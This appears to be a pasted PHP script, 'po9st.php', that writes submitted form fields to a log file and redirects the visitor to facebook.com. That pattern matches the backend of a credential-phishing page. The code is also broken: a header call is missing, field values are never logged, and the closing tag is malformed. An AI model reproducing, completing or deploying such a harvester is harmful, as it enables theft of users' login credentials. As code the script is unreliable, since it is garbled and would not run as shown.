po9st.php
2 years ago in Plain Text
'Location: http://facebook.com'
$file = fopen("log.txt", "a")
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?/